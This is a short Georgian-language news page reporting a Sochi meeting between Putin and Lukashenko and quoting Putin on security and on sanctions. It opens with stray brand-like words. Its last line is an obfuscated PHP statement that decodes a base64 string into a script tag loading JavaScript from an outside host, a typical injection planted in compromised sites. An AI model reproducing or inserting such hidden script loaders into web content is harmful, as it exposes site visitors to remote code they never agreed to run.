celsiusi
ავერსი საქკაბელი
რუსეთის პრეზიდენტი ვლადიმერ პუტინი და ბელარუსის პრეზიდენტი ალექსანდრე ლუკაშენკო ერთმანეთს სოჭში შეხვდნენ.
 
"ჩვენ შევთანხმდით, რომ შეხვედრა გამართულიყო აქ, სოჭში, რადგან გარემოებები მოითხოვს ასეთ სერიოზულ, ღრმა საუბარს. ვგულისხმობ ყველაფერს, რაც ეხება რეგიონის უსაფრთხოების საკითხებს, ჩვენი ქვეყნების უსაფრთხოებას და ყველაფერს, რაც ეხება ეკონომიკას", - განაცხადა პუტინი.
 
მისი თქმით, რუსეთის ეკონომიკა სანქციების ზემოქმედებას „ღირსეულად“ უმკლავდება.
 
"მინდა აღვნიშნო, რომ მიუხედავად ყველა სირთულისა, რუსეთის ეკონომიკა უძლებს სანქციების ზემოქმედებას, საკმაოდ ღირსეულად უმკლავდება. ყველა ძირითადი მაკროეკონომიკური მაჩვენებელი ამაზე მეტყველებს", - განაცხადა პუტინმა.
590
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");